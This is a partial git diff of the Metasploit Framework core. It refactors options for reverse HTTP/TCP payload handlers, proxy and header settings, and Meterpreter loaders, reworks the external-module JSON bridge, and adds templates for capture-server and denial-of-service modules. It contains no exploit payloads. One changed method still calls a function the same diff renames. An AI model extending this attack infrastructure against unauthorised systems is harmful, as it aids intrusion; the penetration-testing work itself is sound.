d9a1d7ff4d..025e127608 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -52,16 +52,38 @@ module ReverseHttp register_advanced_options( [ - - OptString.new('MeterpreterUserAgent', [false, 'The user-agent that the payload should use for communication', Rex::UserAgent.shortest]), - OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']), - OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']), - OptBool.new('OverrideRequestHost', [false, 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', false]), - OptString.new('OverrideLHOST', [false, 'When OverrideRequestHost is set, use this value as the host name for secondary requests']), - OptPort.new('OverrideLPORT', [false, 'When OverrideRequestHost is set, use this value as the port number for secondary requests']), - OptString.new('OverrideScheme', [false, 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https']), - OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

']), - OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false]) + OptAddress.new('ReverseListenerBindAddress', + 'The specific IP address to bind to on the local system' + ), + OptBool.new('OverrideRequestHost', + 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', + ), + OptString.new('OverrideLHOST', + 'When OverrideRequestHost is set, use this value as the host name for secondary requests' + ), + OptPort.new('OverrideLPORT', + 'When OverrideRequestHost is set, use this value as the port number for secondary requests' + ), + OptString.new('OverrideScheme', + 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https' + ), + OptString.new('HttpUserAgent', + 'The user-agent that the payload should use for communication', + default: Rex::UserAgent.shortest, + aliases: ['MeterpreterUserAgent'] + ), + OptString.new('HttpServerName', + 'The server header that the handler will send in response to requests', + default: 'Apache', + aliases: ['MeterpreterServerName'] + ), + OptString.new('HttpUnknownRequestResponse', + 'The returned HTML response body when the handler receives a request that is not from a payload', + default: '

It works!

' + ), + OptBool.new('IgnoreUnknownPayloads', + 'Whether to drop connections from payloads using unknown UUIDs' + ) ], Msf::Handler::ReverseHttp) end @@ -204,7 +226,7 @@ module ReverseHttp raise ex if (ex) - self.service.server_name = datastore['MeterpreterServerName'] + self.service.server_name = datastore['HttpServerName'] # Add the new resource service.add_resource((luri + "/").gsub("//", "/"), @@ -245,14 +267,14 @@ protected info = {} return @proxy_settings if @proxy_settings - if datastore['PayloadProxyHost'].to_s == '' + if datastore['HttpProxyHost'].to_s == '' @proxy_settings = info return @proxy_settings end - info[:host] = datastore['PayloadProxyHost'].to_s - info[:port] = (datastore['PayloadProxyPort'] || 8080).to_i - info[:type] = datastore['PayloadProxyType'].to_s + info[:host] = datastore['HttpProxyHost'].to_s + info[:port] = (datastore['HttpProxyPort'] || 8080).to_i + info[:type] = datastore['HttpProxyType'].to_s uri_host = info[:host] @@ -266,11 +288,11 @@ protected info[:info] = "socks=#{info[:info]}" else info[:info] = "http://#{info[:info]}" - if datastore['PayloadProxyUser'].to_s != '' - info[:username] = datastore['PayloadProxyUser'].to_s + if datastore['HttpProxyUser'].to_s != '' + info[:username] = datastore['HttpProxyUser'].to_s end - if datastore['PayloadProxyPass'].to_s != '' - info[:password] = datastore['PayloadProxyPass'].to_s + if datastore['HttpProxyPass'].to_s != '' + info[:password] = datastore['HttpProxyPass'].to_s end end @@ -347,8 +369,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 997316f688..33269e20e2 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -38,14 +38,11 @@ module ReverseHttpsProxy register_options( [ - OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]), - OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), - OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]), - OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]), - OptEnum.new('PayloadProxyType', [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]), - OptString.new('PayloadProxyUser', [ false, "An optional username for HTTP proxy authentication"]), - OptString.new('PayloadProxyPass', [ false, "An optional password for HTTP proxy authentication"]) - ], Msf::Handler::ReverseHttpsProxy) + OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"), + OptPort.new('LPORT', "The local listener port", default: 8443) + ] + + Msf::Opt::http_proxy_options, + Msf::Handler::ReverseHttpsProxy) register_advanced_options( [ diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index d938d46934..2cba8cf02a 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,15 +45,6 @@ module ReverseTcp # XXX: Not supported by all modules register_advanced_options( [ - OptInt.new( - 'StagerRetryCount', - [ true, 'The number of connection attempts to try before exiting the process', 10 ], - aliases: ['ReverseConnectRetries'] - ), - OptFloat.new( - 'StagerRetryWait', - [ false, 'Number of seconds to wait for the stager between reconnect attempts', 5.0 ] - ), OptAddress.new( 'ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system' ] @@ -62,7 +53,8 @@ module ReverseTcp 'ReverseListenerThreaded', [ true, 'Handle every connection in a new thread (experimental)', false ] ) - ], + ] + + Msf::Opt::stager_retry_options, Msf::Handler::ReverseTcp ) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 3e4ac1a451..d90c9cbfed 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb @@ -1,23 +1,79 @@ module Msf::Module::External + include Msf::Auxiliary::Report + def wait_status(mod) - while mod.running - m = mod.get_status - if m - case m['level'] - when 'error' - print_error m['message'] - when 'warning' - print_warning m['message'] - when 'good' - print_good m['message'] - when 'info' - print_status m['message'] - when 'debug' - vprint_status m['message'] - else - print_status m['message'] + begin + while mod.running + m = mod.get_status + if m + case m.method + when :message + log_output(m) + when :report + process_report(m) + when :reply + # we're done + break + end end end + rescue Interrupt => e + raise e + rescue Exception => e + elog e.backtrace.join("\n") + fail_with Msf::Module::Failure::Unknown, e.message + end + end + + def log_output(m) + message = m.params['message'] + + case m.params['level'] + when 'error' + print_error message + when 'warning' + print_warning message + when 'good' + print_good message + when 'info' + print_status message + when 'debug' + vprint_status message + else + print_status message + end + end + + def process_report(m) + data = m.params['data'] + + case m.params['type'] + when 'host' + # Required + host = {host: data['host']} + + # Optional + host[:state] = data['state'] if data['state'] # TODO: validate -- one of the Msf::HostState constants (unknown, alive, dead) + host[:os_name] = data['os_name'] if data['os_name'] + host[:os_flavor] = data['os_flavor'] if data['os_flavor'] + host[:os_sp] = data['os_sp'] if data['os_sp'] + host[:os_lang] = data['os_lang'] if data['os_lang'] + host[:arch] = data['arch'] if data['arch'] # TODO: validate -- one of the ARCH_* constants + host[:mac] = data['mac'] if data['mac'] + host[:scope] = data['scope'] if data['scope'] + host[:virtual_host] = data['virtual_host'] if data['virtual_host'] + + report_host(host) + when 'service' + # Required + service = {host: data['host'], port: data['port'], proto: data['proto']} + + # Optional + service[:name] = data['name'] if data['name'] + + report_service(service) + else + print_warning "Skipping unrecognized report type #{m.params['type']}" end end end diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index c1b2d5b755..ecc6f3852b 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -24,6 +24,10 @@ module Msf::Module::FullName type + '/' + refname end + def promptname + refname + end + def shortname refname.split('/').last end @@ -55,9 +59,16 @@ module Msf::Module::FullName end # - # Returns the module's framework short name. This is a - # possibly conflicting name used for things like console - # prompts. + # Returns the module's framework prompt-friendly name. + # + # reverse_tcp + # + def promptname + self.class.promptname + end + + # + # Returns the module's framework short name. # # reverse_tcp # diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 90f82c3bd5..de0e7fbaca 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -143,8 +143,7 @@ class Msf::Module::Platform if (not mod.const_defined?('Names')) elog("Failed to instantiate the platform list for module #{mod}") - raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") - return nil + raise "Failed to instantiate the platform list for module #{mod}" end abbrev = mod.const_get('Abbrev') diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 4968937ae4..98d9a1c56d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -116,8 +116,8 @@ module Msf::ModuleManager::Loading loaders.each do |loader| if loader.loadable?(path) - count_by_type.merge!(loader.load_modules(path, options)) do |key, old, new| - old + new + count_by_type.merge!(loader.load_modules(path, options)) do |key, prev, now| + prev + now end end end diff --git a/lib/msf/core/modules/external/bridge.rb b/lib/msf/core/modules/external/bridge.rb index 0a031d668c..c150ae258e 100644 --- a/lib/msf/core/modules/external/bridge.rb +++ b/lib/msf/core/modules/external/bridge.rb @@ -2,6 +2,7 @@ require 'msf/core/modules/external' require 'msf/core/modules/external/message' require 'open3' +require 'json' class Msf::Modules::External::Bridge @@ -26,14 +27,13 @@ class Msf::Modules::External::Bridge def get_status if self.running - n = receive_notification - if n && n['params'] - n['params'] - else + m = receive_notification + if m.nil? close_ios self.running = false - n['response'] if n end + + return m end end @@ -41,30 +41,35 @@ class Msf::Modules::External::Bridge self.env = {} self.running = false self.path = module_path + self.cmd = [self.path, self.path] + self.messages = Queue.new + self.buf = '' end protected attr_writer :path, :running - attr_accessor :env, :ios + attr_accessor :cmd, :env, :ios, :buf, :messages, :wait_thread def describe resp = send_receive(Msf::Modules::External::Message.new(:describe)) close_ios - resp['response'] + resp.params end - # XXX TODO non-blocking writes, check write lengths, non-blocking JSON parse loop read + # XXX TODO non-blocking writes, check write lengths def send_receive(message) send(message) - read_json(message.id, self.ios[1]) + recv(message.id) end def send(message) - input, output, status = ::Open3.popen3(env, [self.path, self.path]) - self.ios = [input, output, status] - case Rex::ThreadSafe.select(nil, [input], nil, 0.1) + input, output, err, status = ::Open3.popen3(self.env, self.cmd) + self.ios = [input, output, err] + self.wait_thread = status + # We would call Rex::Threadsafe directly, but that would require rex for standalone use + case select(nil, [input], nil, 0.1) when nil raise "Cannot run module #{self.path}" when [[], [input], []] @@ -76,12 +81,10 @@ class Msf::Modules::External::Bridge end def receive_notification - input, output, status = self.ios - case Rex::ThreadSafe.select([output], nil, nil, 10) - when nil - nil - when [[output], [], []] - read_json(nil, output) + if self.messages.empty? + recv + else + self.messages.pop end end @@ -89,18 +92,76 @@ class Msf::Modules::External::Bridge fd.write(json) end - def read_json(id, fd) + def recv(filter_id=nil, timeout=600) + _, out, err = self.ios + message = '' + + # Multiple messages can come over the wire all at once, and since yajl + # doesn't play nice with windows, we have to emulate a state machine to + # read just enough off the wire to get one request at a time. Since + # Windows cannot do a nonblocking read on a pipe, we are forced to do a + # whole lot of `select` syscalls and keep a buffer ourselves :( begin - resp = fd.readpartial(10_000) - JSON.parse(resp) + loop do + # This is so we don't end up calling JSON.parse on every char and + # catch an exception. Windows can't do nonblock on pipes, so we + # still have to do the select if we are not at the end of object + # and don't have any buffer left + parts = self.buf.split '}', 2 + if parts.length == 2 # [part, rest] + message << parts[0] << '}' + self.buf = parts[1] + break + elsif parts.length == 1 # [part] + if self.buf[-1] == '}' + message << parts[0] << '}' + self.buf = '' + break + else + message << parts[0] + self.buf = '' + end + end + + # We would call Rex::Threadsafe directly, but that would require Rex for standalone use + res = select([out, err], nil, nil, timeout) + if res == nil + # This is what we would have gotten without Rex and what `readpartial` can also raise + raise EOFError.new + else + fds = res[0] + # Preferentially drain and log stderr + if fds.include? err + errbuf = err.readpartial(4096) + elog "Unexpected output running #{self.path}:\n#{errbuf}" + end + if fds.include? out + self.buf << out.readpartial(4096) + end + end + end + + m = Msf::Modules::External::Message.from_module(JSON.parse(message)) + if filter_id && m.id != filter_id + # We are filtering for a response to a particular message, but we got + # something else, store the message and try again + self.messages.push m + read_json(filter_id, timeout) + else + # Either we weren't filtering, or we got what we were looking for + m + end + rescue JSON::ParserError + # Probably an incomplete response, but no way to really tell. Keep trying + # until EOF + retry rescue EOFError => e - {} + nil end end def close_ios - input, output, status = self.ios - [input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know. + self.ios.each {|fd| fd.close rescue nil} # Yeah, yeah. I know. end end diff --git a/lib/msf/core/modules/external/message.rb b/lib/msf/core/modules/external/message.rb index 429e47fc00..ba3b739a71 100644 --- a/lib/msf/core/modules/external/message.rb +++ b/lib/msf/core/modules/external/message.rb @@ -2,11 +2,25 @@ require 'msf/core/modules/external' require 'base64' require 'json' +require 'securerandom' class Msf::Modules::External::Message - attr_reader :method, :id - attr_accessor :params + attr_reader :method + attr_accessor :params, :id + + def self.from_module(j) + if j['method'] + m = self.new(j['method'].to_sym) + m.params = j['params'] + m + elsif j['response'] + m = self.new(:reply) + m.params = j['response'] + m.id = j['id'] + m + end + end def initialize(m) self.method = m @@ -20,5 +34,5 @@ class Msf::Modules::External::Message protected - attr_writer :method, :id + attr_writer :method end diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 288a8065b2..9b5b563c6a 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -1,20 +1,37 @@ import sys, os, json def log(message, level='info'): - print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': { + rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': { 'level': level, 'message': message - }})) - sys.stdout.flush() + }}) -def run(metadata, exploit): +def report_host(ip, opts={}): + host = opts.copy() + host.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'host', 'data': host + }}) + +def report_service(ip, opts={}): + service = opts.copy() + service.update({'host': ip}) + rpc_send({'jsonrpc': '2.0', 'method': 'report', 'params': { + 'type': 'service', 'data': service + }}) + + +def run(metadata, module_callback): req = json.loads(os.read(0, 10000)) if req['method'] == 'describe': - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': args = req['params'] - exploit(args) - print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': { - 'message': 'Exploit completed' - }})) - sys.stdout.flush() + module_callback(args) + rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': { + 'message': 'Module completed' + }}) + +def rpc_send(req): + print(json.dumps(req)) + sys.stdout.flush() diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4c47d945c8..fe20aaf3ef 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -9,6 +9,13 @@ class Msf::Modules::External::Shim case mod.meta['type'] when 'remote_exploit_cmd_stager' remote_exploit_cmd_stager(mod) + when 'capture_server' + capture_server(mod) + when 'dos' + dos(mod) + else + # TODO have a nice load error show up in the logs + '' end end @@ -26,10 +33,6 @@ class Msf::Modules::External::Shim meta[:name] = mod.meta['name'].dump meta[:description] = mod.meta['description'].dump meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ") - meta[:date] = mod.meta['date'].dump - meta[:references] = mod.meta['references'].map do |r| - "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" - end.join(",\n ") meta[:options] = mod.meta['options'].map do |n, o| "Opt#{o['type'].capitalize}.new(#{n.dump}, @@ -39,11 +42,15 @@ class Msf::Modules::External::Shim end def self.mod_meta_exploit(mod, meta = {}) + meta[:date] = mod.meta['date'].dump meta[:wfsdelay] = mod.meta['wfsdelay'] || 5 meta[:privileged] = mod.meta['privileged'].inspect meta[:platform] = mod.meta['targets'].map do |t| t['platform'].dump end.uniq.join(",\n ") + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") meta[:targets] = mod.meta['targets'].map do |t| "[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]" end.join(",\n ") @@ -56,4 +63,19 @@ class Msf::Modules::External::Shim meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump render_template('remote_exploit_cmd_stager.erb', meta) end + + def self.capture_server(mod) + meta = mod_meta_common(mod) + render_template('capture_server.erb', meta) + end + + def self.dos(mod) + meta = mod_meta_common(mod) + meta[:date] = mod.meta['date'].dump + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") + + render_template('dos.erb', meta) + end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb new file mode 100644 index 0000000000..853350fa67 --- /dev/null +++ b/lib/msf/core/modules/external/templates/capture_server.erb @@ -0,0 +1,26 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + include Msf::Module::External + + def initialize + super({ + <%= common_metadata meta %> + 'Actions' => [ ['Capture'] ], + 'PassiveActions' => ['Capture'], + 'DefaultAction' => 'Capture' + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end diff --git a/lib/msf/core/modules/external/templates/dos.erb b/lib/msf/core/modules/external/templates/dos.erb new file mode 100644 index 0000000000..cbf7c571ea --- /dev/null +++ b/lib/msf/core/modules/external/templates/dos.erb @@ -0,0 +1,29 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + include Msf::Module::External + include Msf::Auxiliary::Dos + + def initialize + super({ + <%= common_metadata meta %> + 'References' => + [ + <%= meta[:references] %> + ], + 'DisclosureDate' => <%= meta[:date] %>, + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 2d0a719fd2..33e1beed32 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -1,7 +1,6 @@ # -*- coding: binary -*- module Msf - # # Builtin framework options with shortcut methods # @@ -51,22 +50,62 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end - # @return [OptEnum] - def self.SSLVersion - Msf::OptEnum.new('SSLVersion', [ false, - 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', - ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + def self.ssl_supported_options + @m ||= ['Auto', 'TLS'] + OpenSSL::SSL::SSLContext::METHODS \ + .select{|m| !m.to_s.include?('client') && !m.to_s.include?('server')} \ + .select{|m| OpenSSL::SSL::SSLContext.new(m) && true rescue false} \ + .map{|m| m.to_s.sub(/v/, '').sub('_', '.')} end - # These are unused but remain for historical reasons - class << self - alias builtin_chost CHOST - alias builtin_cport CPORT - alias builtin_lhost LHOST - alias builtin_lport LPORT - alias builtin_proxies Proxies - alias builtin_rhost RHOST - alias builtin_rport RPORT + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', + enums: self.ssl_supported_options + ) + end + + def self.stager_retry_options + [ + OptInt.new('StagerRetryCount', + 'The number of times the stager should retry if the first connect fails', + default: 10, + aliases: ['ReverseConnectRetries'] + ), + OptInt.new('StagerRetryWait', + 'Number of seconds to wait for the stager between reconnect attempts', + default: 5 + ) + ] + end + + def self.http_proxy_options + [ + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', + aliases: ['PayloadProxyHost'] + ), + OptPort.new('HttpProxyPort', 'An optional proxy server port', + aliases: ['PayloadProxyPort'] + ), + OptString.new('HttpProxyUser', 'An optional proxy server username', + aliases: ['PayloadProxyUser'] + ), + OptString.new('HttpProxyPass', 'An optional proxy server password', + aliases: ['PayloadProxyPass'] + ), + OptEnum.new('HttpProxyType', 'The type of HTTP proxy', + enums: ['HTTP', 'SOCKS'], + aliases: ['PayloadProxyType'] + ) + ] + end + + def self.http_header_options + [ + OptString.new('HttpHostHeader', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpReferer', 'An optional value to use for the Referer HTTP header') + ] end CHOST = CHOST() @@ -78,5 +117,4 @@ module Msf RPORT = RPORT() SSLVersion = SSLVersion() end - end diff --git a/lib/msf/core/opt_base.rb b/lib/msf/core/opt_base.rb index 348a0eca33..3b8c389ce7 100644 --- a/lib/msf/core/opt_base.rb +++ b/lib/msf/core/opt_base.rb @@ -22,15 +22,39 @@ module Msf # attrs[3] = possible enum values # attrs[4] = Regex to validate the option # - def initialize(in_name, attrs = [], aliases: []) + # Attrs can also be specified explicitly via named parameters, or attrs can + # also be a string as standin for the required description field. + # + def initialize(in_name, attrs = [], + required: false, desc: nil, default: nil, enums: [], regex: nil, aliases: []) self.name = in_name self.advanced = false self.evasion = false - self.required = attrs[0] || false - self.desc = attrs[1] - self.default = attrs[2] - self.enums = [ *(attrs[3]) ].map { |x| x.to_s } - regex_temp = attrs[4] || nil + self.aliases = aliases + + if attrs.is_a?(String) || attrs.length == 0 + self.required = required + self.desc = attrs.is_a?(String) ? attrs : desc + self.enums = [ *(enums) ].map { |x| x.to_s } + if default.nil? && enums.length > 0 + self.default = enums[0] + else + self.default = default + end + regex_temp = regex + else + if attrs[0].nil? + self.required = required + else + self.required = attrs[0] + end + self.desc = attrs[1] || desc + self.default = attrs[2] || default + self.enums = attrs[3] || enums + self.enums = [ *(self.enums) ].map { |x| x.to_s } + regex_temp = attrs[4] || regex + end + if regex_temp # convert to string regex_temp = regex_temp.to_s if regex_temp.is_a? Regexp @@ -45,35 +69,34 @@ module Msf raise("Invalid Regex #{regex_temp}: #{e}") end end - self.aliases = aliases end # # Returns true if this is a required option. # def required? - return required + required end # # Returns true if this is an advanced option. # def advanced? - return advanced + advanced end # # Returns true if this is an evasion option. # def evasion? - return evasion + evasion end # # Returns true if the supplied type is equivalent to this option's type. # def type?(in_type) - return (type == in_type) + type == in_type end # @@ -94,7 +117,7 @@ module Msf if regex return !!value.match(regex) end - return true + true end # @@ -102,7 +125,7 @@ module Msf # a valid value # def empty_required_value?(value) - return (required? and value.nil?) + required? && value.nil? end # @@ -169,6 +192,4 @@ module Msf attr_writer :required, :desc, :default # :nodoc: end - end - diff --git a/lib/msf/core/opt_bool.rb b/lib/msf/core/opt_bool.rb index a003817f21..cdee151f2e 100644 --- a/lib/msf/core/opt_bool.rb +++ b/lib/msf/core/opt_bool.rb @@ -1,48 +1,33 @@ # -*- coding: binary -*- module Msf + # Boolean option type + class OptBool < OptBase + TRUE_REGEX = /^(y|yes|t|1|true)$/i + ANY_REGEX = /^(y|yes|n|no|t|f|0|1|true|false)$/i -### -# -# Boolean option. -# -### -class OptBool < OptBase - - TrueRegex = /^(y|yes|t|1|true)$/i - - def type - return 'bool' - end - - def valid?(value, check_empty: true) - return false if empty_required_value?(value) - - if ((value != nil and - (value.to_s.empty? == false) and - (value.to_s.match(/^(y|yes|n|no|t|f|0|1|true|false)$/i) == nil))) - return false + # This overrides default from 'nil' to 'false' + def initialize(in_name, attrs = [], + required: true, desc: nil, default: false, aliases: []) + super end - true - end + def type + return 'bool' + end - def normalize(value) - if(value.nil? or value.to_s.match(TrueRegex).nil?) - false - else - true + def valid?(value, check_empty: true) + return false if check_empty && empty_required_value?(value) + return true if value.nil? && !required? + + !(value.nil? || + value.to_s.empty? || + value.to_s.match(ANY_REGEX).nil?) + end + + def normalize(value) + !(value.nil? || + value.to_s.match(TRUE_REGEX).nil?) end end - - def is_true?(value) - return normalize(value) - end - - def is_false?(value) - return !is_true?(value) - end - -end - end diff --git a/lib/msf/core/opt_enum.rb b/lib/msf/core/opt_enum.rb index 168c74b3dc..4f830ee411 100644 --- a/lib/msf/core/opt_enum.rb +++ b/lib/msf/core/opt_enum.rb @@ -1,48 +1,49 @@ # -*- coding: binary -*- module Msf - -### -# -# Enum option. -# -### -class OptEnum < OptBase - - def type - return 'enum' - end - - def valid?(value=self.value, check_empty: true) - return false if check_empty && empty_required_value?(value) - return true if value.nil? and !required? - - (value and self.enums.include?(value.to_s)) - end - - def normalize(value=self.value) - return nil if not self.valid?(value) - return value.to_s - end - - def desc=(value) - self.desc_string = value - - self.desc - end - - def desc - if self.enums - str = self.enums.join(', ') + ### + # + # Enum option. + # + ### + class OptEnum < OptBase + def type + return 'enum' end - "#{self.desc_string || ''} (Accepted: #{str})" + + # This overrides required default from 'false' to 'true' + def initialize(in_name, attrs = [], + required: true, desc: nil, default: nil, enums: [], aliases: []) + super + end + + def valid?(value = self.value, check_empty: true) + return false if check_empty && empty_required_value?(value) + return true if value.nil? && !required? + + !value.nil? && enums.include?(value.to_s) + end + + def normalize(value = self.value) + if valid?(value) + value.to_s + else + nil + end + end + + def desc=(value) + self.desc_string = value + desc + end + + def desc + str = enums.join(', ') if enums + "#{desc_string || ''} (Accepted: #{str})" + end + + protected + + attr_accessor :desc_string # :nodoc: end - - -protected - - attr_accessor :desc_string # :nodoc: - -end - end diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb index 3bec538d74..cd398c15b6 100644 --- a/lib/msf/core/payload/android/reverse_http.rb +++ b/lib/msf/core/payload/android/reverse_http.rb @@ -20,6 +20,14 @@ module Payload::Android::ReverseHttp include Msf::Payload::Android::PayloadOptions include Msf::Payload::UUID::Options + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options(Msf::Opt::http_header_options) + end + # # Generate the transport-specific configuration # diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 1aff5eab2a..a454191032 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -23,10 +23,13 @@ module Payload::Java::ReverseHttp # def initialize(*args) super - register_advanced_options([ - Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), - Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) - ]) + register_advanced_options( + [ + OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), + OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), + ] + + Msf::Opt::http_header_options + ) end # @@ -64,6 +67,10 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" + c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"] + c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"] + c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"] + c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"] c << "URL=#{scheme}://#{ds['LHOST']}" c << ":#{ds['LPORT']}" if ds['LPORT'] c << luri diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb index 008f99f5a0..1acb8f94e1 100644 --- a/lib/msf/core/payload/multi/reverse_http.rb +++ b/lib/msf/core/payload/multi/reverse_http.rb @@ -22,16 +22,12 @@ module Payload::Multi::ReverseHttp # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) - ]) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end # @@ -67,4 +63,3 @@ module Payload::Multi::ReverseHttp end end - diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 95f2335763..5bb0143857 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -28,10 +28,20 @@ module Payload::Python::MeterpreterLoader 'Stager' => {'Payload' => ""} )) - register_advanced_options([ - OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]), - OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]) - ], self.class) + register_advanced_options( + [ + OptBool.new( + 'MeterpreterTryToFork', + 'Fork a new process if the functionality is available', + default: true + ), + OptBool.new( + 'PythonMeterpreterDebug', + 'Enable debugging for the Python meterpreter' + ), + ] + + Msf::Opt::http_header_options + ) end def stage_payload(opts={}) @@ -85,17 +95,40 @@ module 